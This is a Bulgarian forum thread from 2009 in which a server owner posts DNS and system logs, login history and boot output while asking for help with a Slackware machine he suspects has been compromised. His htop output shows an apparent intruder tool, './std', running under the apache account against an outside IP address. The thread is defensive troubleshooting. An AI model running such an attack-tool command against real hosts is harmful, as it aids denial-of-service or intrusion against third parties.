Тема: Slackware 13 current - мисля че съм хакнат (Прочетена 2953 пъти)

Lucifer · « -: Nov 28, 2009, 02:31 »

И така какъв е проблема ...

От няколко дни на сам машинката на която ми се хоства домейна се държи шантаво. Работи си и в един момент отказва, което се оправя само с рестарт ... нямам никакъв достъп (мрежови, а физически машината е на 500 км и не знам кога ще имам физическа връзка с нея)

Преди малко я ресетнаха и пуснах няколко tail -f:

Ето резултатите:

/var/log/messages:

Код:

Nov 28 01:32:24 gate1 named[2864]: lame server resolving 'www.karieri.bg' (in 'bg'?): 193.68.3.232#53
Nov 28 01:32:25 gate1 named[2864]: lame server resolving 'login.economedia.bg' (in 'bg'?): 193.68.3.232#53
Nov 28 01:32:25 gate1 named[2864]: lame server resolving 'pipe.bg' (in 'bg'?): 193.68.3.232#53
Nov 28 01:32:27 gate1 named[2864]: lame server resolving 'capital.bg' (in 'bg'?): 193.68.3.232#53
Nov 28 01:34:15 gate1 named[2864]: network unreachable resolving 'lydblog.wordpress.com/A/IN': 2001:503:231d::2:30#53
Nov 28 01:34:15 gate1 named[2864]: network unreachable resolving 'lydblog.wordpress.com/A/IN': 2001:503:a83e::2:30#53
Nov 28 01:34:19 gate1 named[2864]: network unreachable resolving 'ns1.wordpress.com/AAAA/IN': 2001:500:2f::f#53
Nov 28 01:34:19 gate1 named[2864]: network unreachable resolving 'ns1.wordpress.com/AAAA/IN': 2001:7fd::1#53
Nov 28 01:34:19 gate1 named[2864]: network unreachable resolving 'ns2.wordpress.com/AAAA/IN': 2001:dc3::35#53
Nov 28 01:34:19 gate1 named[2864]: network unreachable resolving 'ns1.wordpress.com/AAAA/IN': 2001:dc3::35#53
Nov 28 01:34:28 gate1 named[2864]: network unreachable resolving 'E2.nstld.com/AAAA/IN': 2001:500:1::803f:235#53
Nov 28 01:34:28 gate1 named[2864]: network unreachable resolving 'E2.nstld.com/AAAA/IN': 2001:503:ba3e::2:30#53
Nov 28 01:34:28 gate1 named[2864]: network unreachable resolving 'E2.nstld.com/AAAA/IN': 2001:503:c27::2:30#53
Nov 28 01:34:28 gate1 named[2864]: network unreachable resolving 'E2.nstld.com/AAAA/IN': 2001:500:3::42#53
Nov 28 01:34:28 gate1 named[2864]: network unreachable resolving 'E2.nstld.com/AAAA/IN': 2001:500:2f::f#53
Nov 28 01:34:28 gate1 named[2864]: network unreachable resolving 'E2.nstld.com/AAAA/IN': 2001:7fd::1#53
Nov 28 01:34:29 gate1 named[2864]: network unreachable resolving 'ns2.wordpress.com/AAAA/IN': 2001:500:3::42#53
Nov 28 01:34:29 gate1 named[2864]: network unreachable resolving 'ns2.wordpress.com/AAAA/IN': 2001:503:c27::2:30#53
Nov 28 01:34:29 gate1 named[2864]: network unreachable resolving 'ns3.wordpress.com/AAAA/IN': 2001:500:3::42#53
Nov 28 01:34:29 gate1 named[2864]: network unreachable resolving 'ns3.wordpress.com/AAAA/IN': 2001:503:c27::2:30#53
Nov 28 01:34:29 gate1 named[2864]: network unreachable resolving 'ns2.wordpress.com/AAAA/IN': 2001:7fd::1#53
Nov 28 01:34:29 gate1 named[2864]: network unreachable resolving 'ns2.wordpress.com/AAAA/IN': 2001:500:2f::f#53
Nov 28 01:34:29 gate1 named[2864]: network unreachable resolving 'ns2.wordpress.com/AAAA/IN': 2001:500:1::803f:235#53
Nov 28 01:34:29 gate1 named[2864]: network unreachable resolving 'ns3.wordpress.com/AAAA/IN': 2001:7fd::1#53
Nov 28 01:34:29 gate1 named[2864]: network unreachable resolving 'ns3.wordpress.com/AAAA/IN': 2001:500:2f::f#53
Nov 28 01:34:29 gate1 named[2864]: network unreachable resolving 'ns3.wordpress.com/AAAA/IN': 2001:500:1::803f:235#53
Nov 28 01:34:29 gate1 named[2864]: network unreachable resolving 'ns2.wordpress.com/AAAA/IN': 2001:503:ba3e::2:30#53
Nov 28 01:34:29 gate1 named[2864]: network unreachable resolving 'ns3.wordpress.com/AAAA/IN': 2001:503:ba3e::2:30#53
Nov 28 01:34:29 gate1 named[2864]: network unreachable resolving 'ns3.wordpress.com/AAAA/IN': 2001:dc3::35#53
Nov 28 01:34:29 gate1 named[2864]: network unreachable resolving 'ns1.wordpress.com/AAAA/IN': 2001:500:3::42#53
Nov 28 01:34:29 gate1 named[2864]: network unreachable resolving 'ns1.wordpress.com/AAAA/IN': 2001:503:c27::2:30#53
Nov 28 01:34:29 gate1 named[2864]: network unreachable resolving 'ns1.wordpress.com/AAAA/IN': 2001:500:1::803f:235#53
Nov 28 01:34:29 gate1 named[2864]: network unreachable resolving 'ns1.wordpress.com/AAAA/IN': 2001:503:ba3e::2:30#53

/var/log/syslog

Код:

Nov 28 00:09:41 gate1 named[2864]: max open files (1024) is smaller than max sockets (4096)
Nov 28 00:09:41 gate1 named[2864]: zone 'anavaro.com' allows updates by IP address, which is insecure
Nov 28 00:09:41 gate1 named[2864]: zone 'anavaro.com' allows updates by IP address, which is insecure
Nov 28 00:09:41 gate1 named[2864]: rev.anavaro.com.zone:11: unknown RR type 'RTP'
Nov 28 00:09:41 gate1 named[2864]: zone 8.71.77.in-addr.arpa/IN: loading from master file rev.anavaro.com.zone failed: unknown class/type
Nov 28 00:09:41 gate1 named[2864]: zone anavaro.com/IN: NS 'ns1.anavaro.com' has no address records (A or AAAA)
Nov 28 00:09:41 gate1 named[2864]: zone anavaro.com/IN: NS 'ns2.anavaro.com' has no address records (A or AAAA)
Nov 28 00:09:54 gate1 dnsmasq[2972]: failed to create listening socket: Address already in use
Nov 28 00:09:54 gate1 dnsmasq[2972]: FAILED to start up
Nov 28 00:10:39 gate1 sshd[3167]: error: Could not get shadow information for NOUSER

Но най-интересен ми се стори реда от htop, точно преди да забие:

Код:

PID    USER    NI  CPU%  MEM%   VIRT    SHR   S  TIME+     Command
3813  apache  0   65.0    0.1       1776   432    R   1:42.64   ./std 89.137.139.225 0

Не знам ... моля ударете едно рамо ...

Lucifer · « **Отговор #1 -:** Nov 28, 2009, 05:19 »

Току що се върна на линия ... притеснява ме това поведение ... помагайте ... Моля ....

laskov · « **Отговор #2 -:** Nov 28, 2009, 19:04 »

Какво казват last, w, cat /var/log/messages | grep -v named, dmesg ? Трябва да си сигурен, че нямаш хардуерен проблем, прегряване поради спрял вентилатор и др. подобни.
В тази тема от преди доста време, едно от мненията беше "Инсталирай всичко наново", но темата май нещо се е прецакала.
Щом има някой там да натисне копчето ресет, дали не може да сложи едно sysresccd, да напише един ifconfig и passwd root за да можеш да се логнеш в него. Така би могъл да провериш и сравниш чексуми на bash, ps и др.

Lucifer · « **Отговор #3 -:** Nov 29, 2009, 19:36 »

root@gate1:~# last
root pts/0 89.215.207.189 Sun Nov 29 20:06 still logged in
reboot system boot 2.6.29.6-smp Sun Nov 29 20:06 (00:00)
root pts/5 89.215.207.189 Sat Nov 28 05:37 - 19:56 (14:19)
root pts/4 89.215.207.189 Sat Nov 28 05:36 - 09:31 (03:54)
root pts/3 89.215.207.189 Sat Nov 28 05:35 - 19:12 (13:36)
root pts/2 89.215.207.189 Sat Nov 28 05:35 - 07:22 (01:47)
root pts/1 89.215.207.189 Sat Nov 28 05:14 - 18:23 (13:08)
root pts/0 89.215.207.189 Sat Nov 28 04:55 - 18:51 (13:55)
root pts/3 89.215.207.189 Fri Nov 27 23:28 - 01:55 (02:26)
root pts/2 89.215.207.189 Fri Nov 27 23:25 - 02:10 (02:45)
root pts/1 89.215.207.189 Fri Nov 27 23:19 - 01:36 (02:17)
root pts/0 89.215.207.189 Sat Nov 28 00:09 - 01:50 (01:40)
reboot system boot 2.6.29.6-smp Sat Nov 28 00:09 (1+19:57)
root pts/1 89.215.207.189 Fri Nov 27 23:29 - 23:31 (00:01)
root pts/0 89.215.207.189 Fri Nov 27 23:18 - crash (00:51)
reboot system boot 2.6.29.6-smp Fri Nov 27 14:11 (2+05:54)
root pts/0 89.215.207.189 Thu Nov 26 23:21 - 23:22 (00:01)
reboot system boot 2.6.29.6-smp Thu Nov 26 23:20 (2+20:46)
reboot system boot 2.6.29.6-smp Thu Nov 26 22:34 (2+21:32)
root pts/0 bbnfwb15-nat0.eu Thu Nov 26 03:27 - 07:45 (04:17)
root pts/1 bbnfwb15-nat0.eu Thu Nov 26 00:35 - 03:18 (02:42)
root pts/0 bbnfwb15-nat0.eu Wed Nov 25 21:52 - 03:17 (05:25)
reboot system boot 2.6.29.6-smp Tue Nov 24 22:28 (4+21:37)
root pts/0 bbnfwb15-nat0.eu Sun Nov 22 15:46 - 16:02 (00:16)
root pts/0 89.215.207.189 Fri Nov 20 00:24 - 23:34 (00:-50)
reboot system boot 2.6.29.6-smp Wed Nov 18 19:10 (11+00:56)
root pts/3 bbnfwb15-nat0.eu Tue Nov 17 00:47 - 01:12 (00:25)
root pts/2 bbnfwb15-nat0.eu Tue Nov 17 00:40 - 01:13 (00:32)
root pts/1 bbnfwb15-nat0.eu Tue Nov 17 00:36 - 01:13 (00:37)
root pts/0 bbnfwb15-nat0.eu Tue Nov 17 00:34 - 01:13 (00:38)
reboot system boot 2.6.29.6-smp Tue Nov 17 00:33 (12+19:32)
root pts/0 bbnfwb15-nat0.eu Tue Nov 17 00:33 - down (00:00)
root pts/0 bbnfwb15-nat0.eu Tue Nov 17 00:28 - 00:30 (00:01)
root pts/0 bbnfwb15-nat0.eu Sun Nov 15 15:26 - 18:42 (03:16)
root pts/0 89.215.207.189 Fri Nov 13 22:10 - 22:15 (00:04)
reboot system boot 2.6.29.6-smp Wed Nov 11 23:44 (5+00:49)
root pts/0 89.215.207.189 Wed Nov 11 20:51 - 20:51 (00:00)
root pts/0 bbnfwb15-nat0.eu Mon Nov 9 19:29 - 06:33 (11:04)
root pts/0 bbnfwb15-nat0.eu Sat Nov 7 19:41 - 20:16 (00:34)
root pts/0 bbnfwb15-nat0.eu Fri Nov 6 15:32 - 17:01 (01:29)
root pts/0 89.215.207.189 Thu Nov 5 15:54 - 16:04 (00:10)
root pts/0 89.215.207.189 Wed Nov 4 17:43 - 21:09 (03:25)
root pts/0 89.215.207.189 Wed Nov 4 15:36 - 17:43 (02:06)

Code:

root@gate1:~#cat /var/log/messages | grep -v named

Nov 29 04:40:03 gate1 syslogd 1.4.1: restart.
Nov 29 04:53:57 gate1 -- MARK --
Nov 29 05:13:57 gate1 -- MARK --
Nov 29 05:33:57 gate1 -- MARK --
Nov 29 05:53:57 gate1 -- MARK --
Nov 29 06:13:57 gate1 -- MARK --
Nov 29 06:33:57 gate1 -- MARK --
Nov 29 06:48:26 gate1 sshd[21532]: Did not receive identification string from 95.91.122.220
Nov 29 07:13:58 gate1 -- MARK --
Nov 29 07:53:58 gate1 -- MARK --
Nov 29 08:13:58 gate1 -- MARK --
Nov 29 08:53:58 gate1 -- MARK --
Nov 29 09:13:58 gate1 -- MARK --
Nov 29 09:53:58 gate1 -- MARK --
Nov 29 10:13:58 gate1 -- MARK --
Nov 29 10:53:58 gate1 -- MARK --
Nov 29 11:13:58 gate1 -- MARK --
Nov 29 11:53:58 gate1 -- MARK --
Nov 29 12:13:58 gate1 -- MARK --
Nov 29 12:33:58 gate1 -- MARK --
Nov 29 12:53:58 gate1 -- MARK --
Nov 29 13:13:58 gate1 -- MARK --
Nov 29 13:53:58 gate1 -- MARK --
Nov 29 14:13:58 gate1 -- MARK --
Nov 29 14:53:58 gate1 -- MARK --
Nov 29 15:13:58 gate1 -- MARK --
Nov 29 15:53:58 gate1 -- MARK --
Nov 29 16:13:58 gate1 -- MARK --
Nov 29 16:53:58 gate1 -- MARK --
Nov 29 17:13:58 gate1 -- MARK --
Nov 29 17:53:58 gate1 -- MARK --
Nov 29 18:13:58 gate1 -- MARK --
Nov 29 18:53:58 gate1 -- MARK --
Nov 29 20:06:17 gate1 syslogd 1.4.1: restart.
Nov 29 20:06:17 gate1 kernel: klogd 1.4.1, log source = /proc/kmsg started.
Nov 29 20:06:17 gate1 kernel: Linux version 2.6.29.6-smp (root@midas) (gcc version 4.3.3 (GCC) ) #2 SMP Mon Aug 17 00:52:54 CDT 2009
Nov 29 20:06:17 gate1 kernel: BIOS-provided physical RAM map:
Nov 29 20:06:17 gate1 kernel: BIOS-e820: 0000000000000000 - 000000000009fc00 (usable)
Nov 29 20:06:17 gate1 kernel: BIOS-e820: 000000000009fc00 - 00000000000a0000 (reserved)
Nov 29 20:06:17 gate1 kernel: BIOS-e820: 00000000000e0000 - 0000000000100000 (reserved)
Nov 29 20:06:17 gate1 kernel: BIOS-e820: 0000000000100000 - 000000001f7f0000 (usable)
Nov 29 20:06:17 gate1 kernel: BIOS-e820: 000000001f7f0000 - 000000001f800000 (reserved)
Nov 29 20:06:17 gate1 kernel: BIOS-e820: 00000000fec00000 - 0000000100000000 (reserved)
Nov 29 20:06:17 gate1 kernel: DMI 2.3 present.
Nov 29 20:06:17 gate1 kernel: last_pfn = 0x1f7f0 max_arch_pfn = 0x100000
Nov 29 20:06:17 gate1 kernel: 0MB HIGHMEM available.
Nov 29 20:06:17 gate1 kernel: 503MB LOWMEM available.
Nov 29 20:06:17 gate1 kernel: mapped low ram: 0 - 1f7f0000
Nov 29 20:06:17 gate1 kernel: low ram: 00000000 - 1f7f0000
Nov 29 20:06:17 gate1 kernel: bootmap 00002000 - 00005f00
Nov 29 20:06:17 gate1 kernel: (8 early reservations) ==> bootmem [0000000000 - 001f7f0000]
Nov 29 20:06:17 gate1 kernel: #0 [0000000000 - 0000001000] BIOS data page ==> [0000000000 - 0000001000]
Nov 29 20:06:17 gate1 kernel: #1 [0000001000 - 0000002000] EX TRAMPOLINE ==> [0000001000 - 0000002000]
Nov 29 20:06:17 gate1 kernel: #2 [0000006000 - 0000007000] TRAMPOLINE ==> [0000006000 - 0000007000]
Nov 29 20:06:17 gate1 kernel: #3 [0000100000 - 0000b30674] TEXT DATA BSS ==> [0000100000 - 0000b30674]
Nov 29 20:06:17 gate1 kernel: #4 [0000b31000 - 0000b35000] INIT_PG_TABLE ==> [0000b31000 - 0000b35000]
Nov 29 20:06:17 gate1 kernel: #5 [000009fc00 - 0000100000] BIOS reserved ==> [000009fc00 - 0000100000]
Nov 29 20:06:17 gate1 kernel: #6 [0000007000 - 0000008000] PGTABLE ==> [0000007000 - 0000008000]
Nov 29 20:06:17 gate1 kernel: #7 [0000002000 - 0000006000] BOOTMAP ==> [0000002000 - 0000006000]
Nov 29 20:06:17 gate1 kernel: found SMP MP-table at [c00f9bf0] 000f9bf0
Nov 29 20:06:17 gate1 kernel: ACPI: PM-Timer IO Port: 0xf808
Nov 29 20:06:17 gate1 kernel: ACPI: LAPIC (acpi_id[0x01] lapic_id[0x00] enabled)
Nov 29 20:06:17 gate1 kernel: ACPI: LAPIC_NMI (acpi_id[0x01] high edge lint[0x1])
Nov 29 20:06:17 gate1 kernel: ACPI: IOAPIC (id[0x08] address[0xfec00000] gsi_base[0])
Nov 29 20:06:17 gate1 kernel: IOAPIC[0]: apic_id 8, version 32, address 0xfec00000, GSI 0-23
Nov 29 20:06:17 gate1 kernel: ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl)
Nov 29 20:06:17 gate1 kernel: ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 high level)
Nov 29 20:06:17 gate1 kernel: Using ACPI (MADT) for SMP configuration information
Nov 29 20:06:17 gate1 kernel: SMP: Allowing 1 CPUs, 0 hotplug CPUs
Nov 29 20:06:17 gate1 kernel: PM: Registered nosave memory: 000000000009f000 - 00000000000a0000
Nov 29 20:06:17 gate1 kernel: PM: Registered nosave memory: 00000000000a0000 - 00000000000e0000
Nov 29 20:06:17 gate1 kernel: PM: Registered nosave memory: 00000000000e0000 - 0000000000100000
Nov 29 20:06:17 gate1 kernel: Allocating PCI resources starting at 20000000 (gap: 1f800000:df400000)
Nov 29 20:06:17 gate1 kernel: NR_CPUS:32 nr_cpumask_bits:32 nr_cpu_ids:1 nr_node_ids:1
Nov 29 20:06:17 gate1 kernel: PERCPU: Allocating 40960 bytes of per cpu data
Nov 29 20:06:17 gate1 kernel: Kernel command line: auto BOOT_IMAGE=slack ro root=301 vt.default_utf8=0
Nov 29 20:06:17 gate1 kernel: Enabling fast FPU save and restore... done.
Nov 29 20:06:17 gate1 kernel: Enabling unmasked SIMD FPU exception support... done.
Nov 29 20:06:17 gate1 kernel: Initializing CPU#0
Nov 29 20:06:17 gate1 kernel: console [tty0] enabled
Nov 29 20:06:17 gate1 kernel: Dentry cache hash table entries: 65536 (order: 6, 262144 bytes)
Nov 29 20:06:17 gate1 kernel: Inode-cache hash table entries: 32768 (order: 5, 131072 bytes)
Nov 29 20:06:17 gate1 kernel: Memory: 500612k/516032k available (6817k kernel code, 14964k reserved, 2484k data, 456k init, 0k highmem)
Nov 29 20:06:17 gate1 kernel: virtual kernel memory layout:
Nov 29 20:06:17 gate1 kernel: fixmap : 0xffe19000 - 0xfffff000 (1944 kB)
Nov 29 20:06:17 gate1 kernel: pkmap : 0xff800000 - 0xffc00000 (4096 kB)
Nov 29 20:06:17 gate1 kernel: vmalloc : 0xdfff0000 - 0xff7fe000 ( 504 MB)
Nov 29 20:06:17 gate1 kernel: lowmem : 0xc0000000 - 0xdf7f0000 ( 503 MB)
Nov 29 20:06:17 gate1 kernel: .init : 0xc0a22000 - 0xc0a94000 ( 456 kB)
Nov 29 20:06:17 gate1 kernel: .data : 0xc07a8437 - 0xc0a15520 (2484 kB)
Nov 29 20:06:17 gate1 kernel: .text : 0xc0100000 - 0xc07a8437 (6817 kB)
Nov 29 20:06:17 gate1 kernel: Checking if this processor honours the WP bit even in supervisor mode...Ok.
Nov 29 20:06:17 gate1 kernel: SLUB: Genslabs=12, HWalign=128, Order=0-3, MinObjects=0, CPUs=1, Nodes=1
Nov 29 20:06:17 gate1 kernel: Calibrating delay loop (skipped), value calculated using timer frequency.. 3987.77 BogoMIPS (lpj=1993888)
Nov 29 20:06:17 gate1 kernel: Security Framework initialized
Nov 29 20:06:17 gate1 kernel: CPU: Trace cache: 12K uops, L1 D cache: 8K
Nov 29 20:06:17 gate1 kernel: CPU: L2 cache: 512K
Nov 29 20:06:17 gate1 kernel: CPU: Hyper-Threading is disabled
Nov 29 20:06:17 gate1 kernel: Intel machine check architecture supported.
Nov 29 20:06:18 gate1 kernel: Intel machine check reporting enabled on CPU#0.
Nov 29 20:06:18 gate1 kernel: CPU0: Intel P4/Xeon Extended MCE MSRs (12) available
Nov 29 20:06:18 gate1 kernel: Checking 'hlt' instruction... OK.
Nov 29 20:06:18 gate1 kernel: SMP alternatives: switching to UP code
Nov 29 20:06:18 gate1 kernel: Freeing SMP alternatives: 38k freed
Nov 29 20:06:18 gate1 kernel: ACPI: Core revision 20081204
Nov 29 20:06:18 gate1 kernel: ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=-1 pin2=-1
Nov 29 20:06:18 gate1 kernel: CPU0: Intel(R) Pentium(R) 4 CPU 2.00GHz stepping 07
Nov 29 20:06:18 gate1 kernel: Brought up 1 CPUs
Nov 29 20:06:18 gate1 kernel: Total of 1 processors activated (3987.77 BogoMIPS).
Nov 29 20:06:18 gate1 kernel: net_namespace: 956 bytes
Nov 29 20:06:18 gate1 kernel: xor: automatically using best checksumming function: pIII_sse
Nov 29 20:06:18 gate1 kernel: pIII_sse : 2584.000 MB/sec
Nov 29 20:06:18 gate1 kernel: xor: using function: pIII_sse (2584.000 MB/sec)
Nov 29 20:06:18 gate1 kernel: NET: Registered protocol family 16
Nov 29 20:06:18 gate1 kernel: ACPI: bus type pci registered
Nov 29 20:06:18 gate1 kernel: PCI: PCI BIOS revision 2.20 entry at 0xeca48, last bus=5
Nov 29 20:06:18 gate1 kernel: PCI: Using configuration type 1 for base access
Nov 29 20:06:18 gate1 kernel: ACPI: Interpreter enabled
Nov 29 20:06:18 gate1 kernel: ACPI: (supports S0 S1 S3 S4 S5)
Nov 29 20:06:18 gate1 kernel: ACPI: Using IOAPIC for interrupt routing
Nov 29 20:06:18 gate1 kernel: ACPI: No dock devices found.
Nov 29 20:06:18 gate1 kernel: ACPI: PCI Root Bridge [PCI0] (0000:00)
Nov 29 20:06:18 gate1 kernel: pci 0000:00:1d.7: PME# supported from D0 D3hot D3cold
Nov 29 20:06:18 gate1 kernel: pci 0000:00:1d.7: PME# disabled
Nov 29 20:06:18 gate1 kernel: HPET not enabled in BIOS. You might try hpet=force boot option
Nov 29 20:06:18 gate1 kernel: pci 0000:00:1f.0: Enabled i801 SMBus device
Nov 29 20:06:18 gate1 kernel: pci 0000:00:1f.0: quirk: region f800-f87f claimed by ICH4 ACPI/GPIO/TCO
Nov 29 20:06:18 gate1 kernel: pci 0000:00:1f.0: quirk: region fa00-fa3f claimed by ICH4 GPIO
Nov 29 20:06:18 gate1 kernel: pci 0000:00:1f.5: PME# supported from D0 D3hot D3cold
Nov 29 20:06:18 gate1 kernel: pci 0000:00:1f.5: PME# disabled
Nov 29 20:06:18 gate1 kernel: pci 0000:05:04.0: PME# supported from D1 D2 D3hot D3cold
Nov 29 20:06:18 gate1 kernel: pci 0000:05:04.0: PME# disabled
Nov 29 20:06:18 gate1 kernel: pci 0000:05:08.0: PME# supported from D0 D1 D2 D3hot D3cold
Nov 29 20:06:18 gate1 kernel: pci 0000:05:08.0: PME# disabled
Nov 29 20:06:18 gate1 kernel: pci 0000:00:1e.0: transparent bridge
Nov 29 20:06:18 gate1 kernel: ACPI: PCI Interrupt Link [LNKA] (IRQs 3 4 *5 6 7 10 11 14 15)
Nov 29 20:06:18 gate1 kernel: ACPI: PCI Interrupt Link [LNKB] (IRQs 3 4 5 6 7 *10 11 14 15)
Nov 29 20:06:18 gate1 kernel: ACPI: PCI Interrupt Link [LNKC] (IRQs 3 4 5 6 7 10 11 14 15) *0, disabled.
Nov 29 20:06:18 gate1 kernel: ACPI: PCI Interrupt Link [LNKD] (IRQs 3 4 *5 6 7 10 11 14 15)
Nov 29 20:06:18 gate1 kernel: ACPI: PCI Interrupt Link [LNKE] (IRQs 3 4 *5 6 7 10 11 14 15)
Nov 29 20:06:18 gate1 kernel: ACPI: PCI Interrupt Link [LNKF] (IRQs 3 4 5 6 7 10 11 14 15) *0, disabled.
Nov 29 20:06:18 gate1 kernel: ACPI: PCI Interrupt Link [LNKG] (IRQs 3 4 5 6 7 10 11 14 15) *0, disabled.
Nov 29 20:06:18 gate1 kernel: ACPI: PCI Interrupt Link [LNKH] (IRQs 3 4 5 6 7 *10 11 14 15)
Nov 29 20:06:18 gate1 kernel: SCSI subsystem initialized
Nov 29 20:06:18 gate1 kernel: usbcore: registered new interface driver usbfs
Nov 29 20:06:18 gate1 kernel: usbcore: registered new interface driver hub
Nov 29 20:06:18 gate1 kernel: usbcore: registered new device driver usb
Nov 29 20:06:18 gate1 kernel: PCI: Using ACPI for IRQ routing
Nov 29 20:06:18 gate1 kernel: pnp: PnP ACPI init
Nov 29 20:06:18 gate1 kernel: ACPI: bus type pnp registered
Nov 29 20:06:18 gate1 kernel: pnp: PnP ACPI: found 15 devices
Nov 29 20:06:18 gate1 kernel: ACPI: ACPI bus type pnp unregistered
Nov 29 20:06:18 gate1 kernel: system 00:0c: ioport range 0x4d0-0x4d1 has been reserved
Nov 29 20:06:18 gate1 kernel: system 00:0d: ioport range 0x400-0x41f has been reserved
Nov 29 20:06:18 gate1 kernel: system 00:0d: ioport range 0x420-0x43f has been reserved
Nov 29 20:06:18 gate1 kernel: system 00:0d: ioport range 0x440-0x45f has been reserved
Nov 29 20:06:18 gate1 kernel: system 00:0d: ioport range 0x460-0x47f has been reserved
Nov 29 20:06:18 gate1 kernel: system 00:0d: ioport range 0xfa00-0xfa3f has been reserved
Nov 29 20:06:18 gate1 kernel: system 00:0d: ioport range 0xfc00-0xfc7f could not be reserved
Nov 29 20:06:18 gate1 kernel: system 00:0d: ioport range 0xfc80-0xfcff has been reserved
Nov 29 20:06:18 gate1 kernel: system 00:0d: ioport range 0xfe00-0xfe7f has been reserved
Nov 29 20:06:18 gate1 kernel: system 00:0d: ioport range 0xfe80-0xfeff has been reserved
Nov 29 20:06:18 gate1 kernel: system 00:0e: iomem range 0x0-0x9ffff could not be reserved
Nov 29 20:06:18 gate1 kernel: system 00:0e: iomem range 0x100000-0x1f7fffff could not be reserved
Nov 29 20:06:18 gate1 kernel: system 00:0e: iomem range 0x1f800000-0x1f8fffff has been reserved
Nov 29 20:06:18 gate1 kernel: system 00:0e: iomem range 0xe0000-0xfffff could not be reserved
Nov 29 20:06:18 gate1 kernel: system 00:0e: iomem range 0xfec01000-0xffffffff has been reserved
Nov 29 20:06:18 gate1 kernel: system 00:0e: iomem range 0xcc400-0xdffff has been reserved
Nov 29 20:06:18 gate1 kernel: pci 0000:00:1e.0: PCI bridge, secondary bus 0000:05
Nov 29 20:06:18 gate1 kernel: pci 0000:00:1e.0: IO window: 0x1000-0x1fff
Nov 29 20:06:18 gate1 kernel: pci 0000:00:1e.0: MEM window: 0xfc500000-0xfc7fffff
Nov 29 20:06:18 gate1 kernel: pci 0000:00:1e.0: PREFETCH window: 0x00000020000000-0x000000200fffff
Nov 29 20:06:18 gate1 kernel: NET: Registered protocol family 2
Nov 29 20:06:18 gate1 kernel: IP route cache hash table entries: 4096 (order: 2, 16384 bytes)
Nov 29 20:06:18 gate1 kernel: TCP established hash table entries: 16384 (order: 5, 131072 bytes)
Nov 29 20:06:18 gate1 kernel: TCP bind hash table entries: 16384 (order: 5, 131072 bytes)
Nov 29 20:06:18 gate1 kernel: TCP: Hash tables configured (established 16384 bind 16384)
Nov 29 20:06:18 gate1 kernel: TCP reno registered
Nov 29 20:06:18 gate1 kernel: NET: Registered protocol family 1
Nov 29 20:06:18 gate1 kernel: VFS: Disk quotas dquot_6.5.2
Nov 29 20:06:18 gate1 kernel: NTFS driver 2.1.29 [Flags: R/W].
Nov 29 20:06:18 gate1 kernel: JFS: nTxBlock = 3911, nTxLock = 31294
Nov 29 20:06:18 gate1 kernel: SGI XFS with ACLs, security attributes, large block/inode numbers, no debug enabled
Nov 29 20:06:18 gate1 kernel: SGI XFS Quota Management subsystem
Nov 29 20:06:18 gate1 kernel: msgmni has been set to 977
Nov 29 20:06:18 gate1 kernel: alg: No test for cipher_null (cipher_null-generic)
Nov 29 20:06:18 gate1 kernel: alg: No test for digest_null (digest_null-generic)
Nov 29 20:06:18 gate1 kernel: alg: No test for compress_null (compress_null-generic)
Nov 29 20:06:18 gate1 kernel: alg: No test for fcrypt (fcrypt-generic)
Nov 29 20:06:18 gate1 kernel: alg: No test for stdrng (krng)
Nov 29 20:06:18 gate1 kernel: async_tx: api initialized (async)
Nov 29 20:06:18 gate1 kernel: Block layer SCSI generic (bsg) driver version 0.4 loaded (major 254)
Nov 29 20:06:18 gate1 kernel: io scheduler noop registered
Nov 29 20:06:18 gate1 kernel: io scheduler anticipatory registered
Nov 29 20:06:18 gate1 kernel: io scheduler deadline registered
Nov 29 20:06:18 gate1 kernel: io scheduler cfq registered (default)
Nov 29 20:06:18 gate1 kernel: pci_hotplug: PCI Hot Plug PCI Core version: 0.5
Nov 29 20:06:18 gate1 kernel: vesafb: framebuffer at 0xf0000000, mapped to 0xe0280000, using 1536k, total 8000k
Nov 29 20:06:18 gate1 kernel: vesafb: mode is 1024x768x8, linelength=1024, pages=9
Nov 29 20:06:18 gate1 kernel: vesafb: scrolling: redraw
Nov 29 20:06:18 gate1 kernel: vesafb: Pseudocolor: size=8:8:8:8, shift=0:0:0:0
Nov 29 20:06:18 gate1 kernel: fb0: VESA VGA frame buffer device
Nov 29 20:06:18 gate1 kernel: isapnp: Scanning for PnP cards...
Nov 29 20:06:18 gate1 kernel: isapnp: No Plug & Play device found
Nov 29 20:06:18 gate1 kernel: Serial: 8250/16550 driver, 4 ports, IRQ sharing enabled
Nov 29 20:06:18 gate1 kernel: serial8250: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
Nov 29 20:06:18 gate1 kernel: serial8250: ttyS1 at I/O 0x2f8 (irq = 3) is a 16550A
Nov 29 20:06:18 gate1 kernel: 00:08: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
Nov 29 20:06:18 gate1 kernel: 00:09: ttyS1 at I/O 0x2f8 (irq = 3) is a 16550A
Nov 29 20:06:18 gate1 kernel: Floppy drive(s): fd0 is 1.44M
Nov 29 20:06:18 gate1 kernel: FDC 0 is a post-1991 82077
Nov 29 20:06:18 gate1 kernel: brd: module loaded
Nov 29 20:06:18 gate1 kernel: loop: module loaded
Nov 29 20:06:18 gate1 kernel: HP CISS Driver (v 3.6.20)
Nov 29 20:06:18 gate1 kernel: input: Macintosh mouse button emulation as /devices/virtual/input/input0
Nov 29 20:06:18 gate1 kernel: Uniform Multi-Platform E-IDE driver
Nov 29 20:06:18 gate1 kernel: piix 0000:00:1f.1: IDE controller (0x8086:0x24cb rev 0x01)
Nov 29 20:06:18 gate1 kernel: pci 0000:00:1f.1: enabling device (0005 -> 0007)
Nov 29 20:06:18 gate1 kernel: pci 0000:00:1f.1: PCI INT A -> GSI 18 (level, low) -> IRQ 18
Nov 29 20:06:18 gate1 kernel: piix 0000:00:1f.1: not 100%% native mode: will probe irqs later
Nov 29 20:06:18 gate1 kernel: ide0: BM-DMA at 0x24a0-0x24a7
Nov 29 20:06:18 gate1 kernel: ide1: BM-DMA at 0x24a8-0x24af
Nov 29 20:06:18 gate1 kernel: hda: WDC WD400BB-60DGA0, ATA DISK drive
Nov 29 20:06:18 gate1 kernel: hda: UDMA/100 mode selected
Nov

Lucifer · « **Отговор #4 -:** Nov 29, 2009, 19:50 »

So ... Наистина са ме хакнали ... идеята е колко точно

